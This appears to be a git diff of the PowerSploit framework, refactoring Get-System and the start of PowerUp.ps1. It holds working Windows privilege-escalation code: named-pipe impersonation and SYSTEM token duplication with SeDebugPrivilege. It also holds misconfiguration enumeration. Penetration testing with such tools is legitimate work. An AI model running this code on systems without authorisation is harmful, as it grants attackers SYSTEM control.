"[Get-System] CreateService failed, LastError: $err" } # final cleanup - close off the manager handle - Write-Verbose "Closing the manager handle" + Write-Verbose '[Get-System] Closing the manager handle' $Null = $CloseServiceHandle.Invoke($ManagerHandle) } else { # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx - Write-Warning "[!] OpenSCManager failed, LastError: $err" + Write-Warning "[Get-System] OpenSCManager failed, LastError: $err" } if($Success) { - Write-Verbose "Waiting for pipe connection" + Write-Verbose '[Get-System] Waiting for pipe connection' $Pipe.WaitForConnection() $Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd() $Out = $ImpersonateNamedPipeClient.Invoke([Int]$PipeHandle) - Write-Verbose "ImpersonateNamedPipeClient: $Out" + Write-Verbose "[Get-System] ImpersonateNamedPipeClient: $Out" } # clocse off the named pipe @@ -366,7 +372,7 @@ function Get-System { $PrivilegesField = $TokenPrivilegesTypeBuilder.DefineField('Privileges', $Luid_and_AttributesStruct.MakeArrayType(), 'Public') $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 1)) $PrivilegesField.SetCustomAttribute($AttribBuilder) - $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType() + # $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType() $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder( ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]), @@ -452,18 +458,18 @@ function Get-System { @([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]), [Runtime.InteropServices.CallingConvention]::Winapi, 'Auto').SetCustomAttribute($AttribBuilder) - + $Win32Methods = $Win32TypeBuilder.CreateType() - $Win32Native = [Int32].Assembly.GetTypes() | ? {$_.Name -eq 'Win32Native'} + $Win32Native = [Int32].Assembly.GetTypes() | Where-Object {$_.Name -eq 'Win32Native'} $GetCurrentProcess = $Win32Native.GetMethod( 'GetCurrentProcess', [Reflection.BindingFlags] 'NonPublic, Static' ) - + $SE_PRIVILEGE_ENABLED = 0x00000002 $STANDARD_RIGHTS_REQUIRED = 0x000F0000 - $STANDARD_RIGHTS_READ = 0x00020000 + # $STANDARD_RIGHTS_READ = 0x00020000 $TOKEN_ASSIGN_PRIMARY = 0x00000001 $TOKEN_DUPLICATE = 0x00000002 $TOKEN_IMPERSONATE = 0x00000004 @@ -473,7 +479,7 @@ function Get-System { $TOKEN_ADJUST_GROUPS = 0x00000040 $TOKEN_ADJUST_DEFAULT = 0x00000080 $TOKEN_ADJUST_SESSIONID = 0x00000100 - $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY + # $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY $TOKEN_ALL_ACCESS = $STANDARD_RIGHTS_REQUIRED -bor $TOKEN_ASSIGN_PRIMARY -bor $TOKEN_DUPLICATE -bor @@ -492,18 +498,18 @@ function Get-System { $tokPriv1Luid.Luid = $Luid $tokPriv1Luid.Attr = $SE_PRIVILEGE_ENABLED - $RetVal = $Win32Methods::LookupPrivilegeValue($Null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid) + $RetVal = $Win32Methods::LookupPrivilegeValue($Null, 'SeDebugPrivilege', [ref]$tokPriv1Luid.Luid) $htoken = [IntPtr]::Zero $RetVal = $Win32Methods::OpenProcessToken($GetCurrentProcess.Invoke($Null, @()), $TOKEN_ALL_ACCESS, [ref]$htoken) - $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct) + # $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct) $RetVal = $Win32Methods::AdjustTokenPrivileges($htoken, $False, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero) if(-not($RetVal)) { - Write-Error "AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop + Write-Error "[Get-System] AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop } - + $LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value $SystemHandle = Get-WmiObject -Class Win32_Process | ForEach-Object { @@ -522,36 +528,38 @@ function Get-System { } } } - catch {} - } | Where-Object {$_ -and ($_ -ne 0)} | Select -First 1 - + catch { + Write-Verbose "[Get-System] error enumerating handle: $_" + } + } | Where-Object {$_ -and ($_ -ne 0)} | Select-Object -First 1 + if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) { - Write-Error 'Unable to obtain a handle to a system process.' - } + Write-Error '[Get-System] Unable to obtain a handle to a system process.' + } else { [IntPtr]$SystemToken = [IntPtr]::Zero $RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Verbose "OpenProcessToken result: $RetVal" - Write-Verbose "OpenProcessToken result: $LastError" + Write-Verbose "[Get-System] OpenProcessToken result: $RetVal" + Write-Verbose "[Get-System] OpenProcessToken result: $LastError" [IntPtr]$DulicateTokenHandle = [IntPtr]::Zero $RetVal = $Win32Methods::DuplicateToken($SystemToken, 2, [ref]$DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Verbose "DuplicateToken result: $LastError" + Write-Verbose "[Get-System] DuplicateToken result: $LastError" $RetVal = $Win32Methods::SetThreadToken([IntPtr]::Zero, $DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() if(-not($RetVal)) { - Write-Error "SetThreadToken failed, RetVal : $RetVal" -ErrorAction Stop + Write-Error "[Get-System] SetThreadToken failed, RetVal : $RetVal" -ErrorAction Stop } - Write-Verbose "SetThreadToken result: $LastError" + Write-Verbose "[Get-System] SetThreadToken result: $LastError" $null = $Win32Methods::CloseHandle($Handle) } } if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') { - Write-Error "Script must be run in STA mode, relaunch powershell.exe with -STA flag" -ErrorAction Stop + Write-Error "[Get-System] Script must be run in STA mode, relaunch powershell.exe with -STA flag" -ErrorAction Stop } if($PSBoundParameters['WhoAmI']) { @@ -566,17 +574,17 @@ function Get-System { $RetVal = $RevertToSelf.Invoke() if($RetVal) { - Write-Output "RevertToSelf successful." + Write-Output "[Get-System] RevertToSelf successful." } else { - Write-Warning "RevertToSelf failed." + Write-Warning "[Get-System] RevertToSelf failed." } Write-Output "Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" } else { if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { - Write-Error "Script must be run as administrator" -ErrorAction Stop + Write-Error "[Get-System] Script must be run as administrator" -ErrorAction Stop } if($Technique -eq 'NamedPipe') { diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1 index 072b03e6..45edcecf 100644 --- a/Privesc/PowerUp.ps1 +++ b/Privesc/PowerUp.ps1 @@ -1,11 +1,13 @@ <# - PowerUp aims to be a clearinghouse of common Windows privilege escalation - vectors that rely on misconfigurations. See README.md for more information. - Author: @harmj0y - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None +PowerUp aims to be a clearinghouse of common Windows privilege escalation +vectors that rely on misconfigurations. See README.md for more information. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + #> #Requires -Version 2 @@ -19,8 +21,7 @@ # ######################################################## -function New-InMemoryModule -{ +function New-InMemoryModule { <# .SYNOPSIS @@ -48,8 +49,9 @@ ModuleName is not provided, it will default to a GUID. $Module = New-InMemoryModule -ModuleName Win32 #> - Param - ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] @@ -76,19 +78,17 @@ $Module = New-InMemoryModule -ModuleName Win32 # A helper function used to reduce typing while defining function # prototypes for Add-Win32Type. -function func -{ - Param - ( - [Parameter(Position = 0, Mandatory=$True)] +function func { + Param ( + [Parameter(Position = 0, Mandatory = $True)] [String] $DllName, - [Parameter(Position = 1, Mandatory=$True)] + [Parameter(Position = 1, Mandatory = $True)] [string] $FunctionName, - [Parameter(Position = 2, Mandatory=$True)] + [Parameter(Position = 2, Mandatory = $True)] [Type] $ReturnType, @@ -363,8 +363,7 @@ are all incorporated into the same in-memory module. } -function psenum -{ +function psenum { <# .SYNOPSIS @@ -431,8 +430,7 @@ New-Enum. :P #> [OutputType([Type])] - Param - ( + Param ( [Parameter(Position = 0, Mandatory=$True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, @@ -483,10 +481,8 @@ New-Enum. :P # A helper function used to reduce typing while defining struct # fields. -function field -{ - Param - ( +function field { + Param ( [Parameter(Position = 0, Mandatory=$True)] [UInt16] $Position, @@ -608,8 +604,7 @@ New-Struct. :P #> [OutputType([Type])] - Param - ( + Param ( [Parameter(Position = 1, Mandatory=$True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, @@ -741,67 +736,75 @@ New-Struct. :P function Get-ModifiablePath { <# - .SYNOPSIS +.SYNOPSIS + +Parses a passed string containing multiple possible file/folder paths and returns +the file paths where the current user has modification rights. - Parses a passed string containing multiple possible file/folder paths and returns - the file paths where the current user has modification rights. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - Author: @harmj0y - License: BSD 3-Clause +.DESCRIPTION + +Takes a complex path specification of an initial file/folder path with possible +configuration files, 'tokenizes' the string in a number of possible ways, and +enumerates the ACLs for each path that currently exists on the system. Any path that +the current user has modification rights on is returned in a custom object that contains +the modifiable path, associated permission set, and the IdentityReference with the specified +rights. The SID of the current user and any group he/she are a part of are used as the +comparison set against the parsed path DACLs. - .DESCRIPTION +.PARAMETER Path - Takes a complex path specification of an initial file/folder path with possible - configuration files, 'tokenizes' the string in a number of possible ways, and - enumerates the ACLs for each path that currently exists on the system. Any path that - the current user has modification rights on is returned in a custom object that contains - the modifiable path, associated permission set, and the IdentityReference with the specified - rights. The SID of the current user and any group he/she are a part of are used as the - comparison set against the parsed path DACLs. +The string path to parse for modifiable files. Required - .PARAMETER Path +.PARAMETER Literal - The string path to parse for modifiable files. Required +Switch. Treat all paths as literal (i.e. don't do 'tokenization'). + +.EXAMPLE - .PARAMETER LiteralPaths +'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath - Switch. Treat all paths as literal (i.e. don't do 'tokenization'). +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Temp\blah.exe {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... +C:\Temp\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... - .EXAMPLE +.EXAMPLE - PS C:\> '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath +Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath - Path Permissions IdentityReference - ---- ----------- ----------------- - C:\Temp\blah.exe {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... - C:\Temp\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Vuln\blah.bat {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... +C:\Vuln\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... +... - .EXAMPLE +.OUTPUTS - PS C:\> Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath +PowerUp.TokenPrivilege.ModifiablePath - Path Permissions IdentityReference - ---- ----------- ----------------- - C:\Vuln\blah.bat {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... - C:\Vuln\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic... - ... +Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for +a modifiable path. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ModifiablePath')] [CmdletBinding()] Param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('FullName')] [String[]] $Path, + [Alias('LiteralPaths')] [Switch] - $LiteralPaths + $Literal ) BEGIN { - # # false positives ? - # $Excludes = @("MsMpEng.exe", "NisSrv.exe") - # from http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights $AccessMask = @{ [uint32]'0x80000000' = 'GenericRead' @@ -829,7 +832,6 @@ function Get-ModifiablePath { $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value $CurrentUserSids += $UserIdentity.User.Value - $TranslatedIdentityReferences = @{} } @@ -842,23 +844,18 @@ function Get-ModifiablePath { # possible separator character combinations $SeparationCharacterSets = @('"', "'", ' ', "`"'", '" ', "' ", "`"' ") - if($PSBoundParameters['LiteralPaths']) { + if ($PSBoundParameters['Literal']) { $TempPath = $([System.Environment]::ExpandEnvironmentVariables($TargetPath)) - if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) { + if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) { $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path } else { # if the path doesn't exist, check if the parent folder allows for modification - try { - $ParentPath = Split-Path $TempPath -Parent - if($ParentPath -and (Test-Path -Path $ParentPath)) { - $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path - } - } - catch { - # because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely + $ParentPath = Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue + if ($ParentPath -and (Test-Path -Path $ParentPath)) { + $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path } } } @@ -866,12 +863,12 @@ function Get-ModifiablePath { ForEach($SeparationCharacterSet in $SeparationCharacterSets) { $TargetPath.Split($SeparationCharacterSet) | Where-Object {$_ -and ($_.trim() -ne '')} | ForEach-Object { - if(($SeparationCharacterSet -notmatch ' ')) { + if (($SeparationCharacterSet -notmatch ' ')) { $TempPath = $([System.Environment]::ExpandEnvironmentVariables($_)).Trim() - if($TempPath -and ($TempPath -ne '')) { - if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) { + if ($TempPath -and ($TempPath -ne '')) { + if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) { # if the path exists, resolve it and add it to the candidate list $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path } @@ -879,14 +876,12 @@ function Get-ModifiablePath { else { # if the path doesn't exist, check if the parent folder allows for modification try { - $ParentPath = (Split-Path -Path $TempPath -Parent).Trim() - if($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath )) { - $CandidatePaths += Resolve-Path -Path $ParentPath | Select-Object -ExpandProperty Path + $ParentPath = (Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue).Trim() + if ($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath -ErrorAction SilentlyContinue)) { + $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path } } - catch { - # trap because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely - } + catch {} } } } @@ -904,14 +899,14 @@ function Get-ModifiablePath { $FileSystemRights = $_.FileSystemRights.value__ - $Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $accessMask[$_] } + $Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $AccessMask[$_] } # the set of permission types that allow for modification $Comparison = Compare-Object -ReferenceObject $Permissions -DifferenceObject @('GenericWrite', 'GenericAll', 'MaximumAllowed', 'WriteOwner', 'WriteDAC', 'WriteData/AddFile', 'AppendData/AddSubdirectory') -IncludeEqual -ExcludeDifferent - if($Comparison) { + if ($Comparison) { if ($_.IdentityReference -notmatch '^S-1-5.*') { - if(-not ($TranslatedIdentityReferences[$_.IdentityReference])) { + if (-not ($TranslatedIdentityReferences[$_.IdentityReference])) { # translate the IdentityReference if it's a username and not a SID $IdentityUser = New-Object System.Security.Principal.NTAccount($_.IdentityReference) $TranslatedIdentityReferences[$_.IdentityReference] = $IdentityUser.Translate([System.Security.Principal.SecurityIdentifier]) | Select-Object -ExpandProperty Value @@ -922,12 +917,13 @@ function Get-ModifiablePath { $IdentitySID = $_.IdentityReference } - if($CurrentUserSids -contains $IdentitySID) { - New-Object -TypeName PSObject -Property @{ - ModifiablePath = $CandidatePath - IdentityReference = $_.IdentityReference - Permissions = $Permissions - } + if ($CurrentUserSids -contains $IdentitySID) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ModifiablePath' $CandidatePath + $Out | Add-Member Noteproperty 'IdentityReference' $_.IdentityReference + $Out | Add-Member Noteproperty 'Permissions' $Permissions + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiablePath') + $Out } } } @@ -937,398 +933,999 @@ function Get-ModifiablePath { } -function Get-CurrentUserTokenGroupSid { +function Get-TokenInformation { <# - .SYNOPSIS +.SYNOPSIS + +Helpers that returns token groups or privileges for a passed process/thread token. +Used by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege. - Returns all SIDs that the current user is a part of, whether they are disabled or not. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - Author: @harmj0y - License: BSD 3-Clause +.DESCRIPTION - .DESCRIPTION +Wraps the GetTokenInformation() Win 32API call to query the given token for +either token groups (-InformationClass "Groups") or privileges (-InformationClass "Privileges"). +For token groups, group is iterated through and the SID structure is converted to a readable +string using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of +(disabled or not) is returned as a string array. - First gets the current process handle using the GetCurrentProcess() Win32 API call and feeds - this to OpenProcessToken() to open up a handle to the current process token. The API call - GetTokenInformation() is then used to enumerate the TOKEN_GROUPS for the current process - token. Each group is iterated through and the SID structure is converted to a readable - string using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of - (disabled or not) is returned as a string array. +.PARAMETER TokenHandle - .LINK +The IntPtr token handle to query. Required. - https://msdn.microsoft.com/en-us/library/windows/desktop/aa446671(v=vs.85).aspx - https://msdn.microsoft.com/en-us/library/windows/desktop/aa379624(v=vs.85).aspx - https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx -#> +.PARAMETER InformationClass - [CmdletBinding()] - Param() +The type of information to query for the token handle, either 'Groups', 'Privileges', or 'Type'. - $CurrentProcess = $Kernel32::GetCurrentProcess() +.OUTPUTS - $TOKEN_QUERY= 0x0008 +PowerUp.TokenGroup - # open up a pseudo handle to the current process- don't need to worry about closing - [IntPtr]$hProcToken = [IntPtr]::Zero - $Success = $Advapi32::OpenProcessToken($CurrentProcess, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. - if($Success) { - $TokenGroupsPtrSize = 0 - # Initial query to determine the necessary buffer size - $Success = $Advapi32::GetTokenInformation($hProcToken, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize) +PowerUp.TokenPrivilege - [IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize) +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed - # query the current process token with the 'TokenGroups=2' TOKEN_INFORMATION_CLASS enum to retrieve a TOKEN_GROUPS structure - $Success = $Advapi32::GetTokenInformation($hProcToken, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() +PowerUp.TokenType + +Outputs a custom object containing the token type and impersonation level for the specified token if +"-InformationClass 'Type'" is passed + +.LINK + +https://msdn.microsoft.com/en-us/library/windows/desktop/aa446671(v=vs.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa379624(v=vs.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa379626(v=vs.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa379630(v=vs.85).aspx +#> - if($Success) { + [OutputType('PowerUp.TokenGroup')] + [OutputType('PowerUp.TokenPrivilege')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] + [Alias('hToken', 'Token')] + [ValidateNotNullOrEmpty()] + [IntPtr] + $TokenHandle, - $TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS + [String[]] + [ValidateSet('Groups', 'Privileges', 'Type')] + $InformationClass = 'Privileges' + ) - For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) { - # convert each token group SID to a displayable string - $SidString = '' - $Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - if($Result -eq 0) { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + PROCESS { + if ($InformationClass -eq 'Groups') { + # query the process token with the TOKEN_INFORMATION_CLASS = 2 enum to retrieve a TOKEN_GROUPS structure + + # initial query to determine the necessary buffer size + $TokenGroupsPtrSize = 0 + $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize) + [IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize) + + $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Success) { + $TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS + For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) { + # convert each token group SID to a displayable string + + if ($TokenGroups.Groups[$i].SID) { + $SidString = '' + $Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($Result -eq 0) { + Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $GroupSid = New-Object PSObject + $GroupSid | Add-Member Noteproperty 'SID' $SidString + # cast the atttributes field as our SidAttributes enum + $GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes) + $GroupSid | Add-Member Noteproperty 'TokenHandle' $TokenHandle + $GroupSid.PSObject.TypeNames.Insert(0, 'PowerUp.TokenGroup') + $GroupSid + } + } } - else { - $GroupSid = New-Object PSObject - $GroupSid | Add-Member Noteproperty 'SID' $SidString - # cast the atttributes field as our SidAttributes enum - $GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes) - $GroupSid + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenGroupsPtr) + } + elseif ($InformationClass -eq 'Privileges') { + # query the process token with the TOKEN_INFORMATION_CLASS = 3 enum to retrieve a TOKEN_PRIVILEGES structure + + # initial query to determine the necessary buffer size + $TokenPrivilegesPtrSize = 0 + $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, 0, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize) + [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesPtrSize) + + $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, $TokenPrivilegesPtr, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Success) { + $TokenPrivileges = $TokenPrivilegesPtr -as $TOKEN_PRIVILEGES + For ($i=0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) { + $Privilege = New-Object PSObject + $Privilege | Add-Member Noteproperty 'Privilege' $TokenPrivileges.Privileges[$i].Luid.LowPart.ToString() + # cast the lower Luid field as our LuidAttributes enum + $Privilege | Add-Member Noteproperty 'Attributes' ($TokenPrivileges.Privileges[$i].Attributes -as $LuidAttributes) + $Privilege | Add-Member Noteproperty 'TokenHandle' $TokenHandle + $Privilege.PSObject.TypeNames.Insert(0, 'PowerUp.TokenPrivilege') + $Privilege } } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) } else { - Write-Warning ([ComponentModel.Win32Exception] $LastError) - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenGroupsPtr) - } - else { - Write-Warning ([ComponentModel.Win32Exception] $LastError) - } -} + $TokenResult = New-Object PSObject + # query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a TOKEN_TYPE enum -function Add-ServiceDacl { -<# - .SYNOPSIS + # initial query to determine the necessary buffer size + $TokenTypePtrSize = 0 + $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenTypePtrSize, [ref]$TokenTypePtrSize) + [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypePtrSize) - Adds a Dacl field to a service object returned by Get-Service. + $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenTypePtr, $TokenTypePtrSize, [ref]$TokenTypePtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause + if ($Success) { + $Temp = $TokenTypePtr -as $TOKEN_TYPE + $TokenResult | Add-Member Noteproperty 'Type' $Temp.Type + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr) - .DESCRIPTION + # now query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a SECURITY_IMPERSONATION_LEVEL enum - Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a - Dacl field to each object. It does this by opening a handle with ReadControl for the - service with using the GetServiceHandle Win32 API call and then uses - QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + # initial query to determine the necessary buffer size + $TokenImpersonationLevelPtrSize = 0 + $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize) + [IntPtr]$TokenImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenImpersonationLevelPtrSize) - .PARAMETER Name + $Success2 = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenImpersonationLevelPtr, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - An array of one or more service names to add a service Dacl for. Passable on the pipeline. + if ($Success2) { + $Temp = $TokenImpersonationLevelPtr -as $IMPERSONATION_LEVEL + $TokenResult | Add-Member Noteproperty 'ImpersonationLevel' $Temp.ImpersonationLevel + $TokenResult | Add-Member Noteproperty 'TokenHandle' $TokenHandle + $TokenResult.PSObject.TypeNames.Insert(0, 'PowerUp.TokenType') + $TokenResult + } + else { + Write-Warning ([ComponentModel.Win32Exception] $LastError) + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenImpersonationLevelPtr) + } + } +} - .EXAMPLE - PS C:\> Get-Service | Add-ServiceDacl +function Get-ProcessTokenGroup { +<# +.SYNOPSIS - Add Dacls for every service the current user can read. +Returns all SIDs that the current token context is a part of, whether they are disabled or not. - .EXAMPLE +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation - PS C:\> Get-Service -Name VMTools | Add-ServiceDacl +.DESCRIPTION - Add the Dacl to the VMTools service object. +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. The token +is then passed to Get-TokenInformation to query the current token groups for the specified +token. - .OUTPUTS +.PARAMETER Id - ServiceProcess.ServiceController +The process ID to enumerate token groups for, otherwise defaults to the current process. - .LINK +.EXAMPLE - https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ -#> +Get-ProcessTokenGroup + +SID Attributes TokenHandle ProcessId +--- ---------- ----------- --------- +S-1-5-21-8901718... ...SE_GROUP_ENABLED 1616 3684 +S-1-1-0 ...SE_GROUP_ENABLED 1616 3684 +S-1-5-32-544 ..., SE_GROUP_OWNER 1616 3684 +S-1-5-32-545 ...SE_GROUP_ENABLED 1616 3684 +S-1-5-4 ...SE_GROUP_ENABLED 1616 3684 +S-1-2-1 ...SE_GROUP_ENABLED 1616 3684 +S-1-5-11 ...SE_GROUP_ENABLED 1616 3684 +S-1-5-15 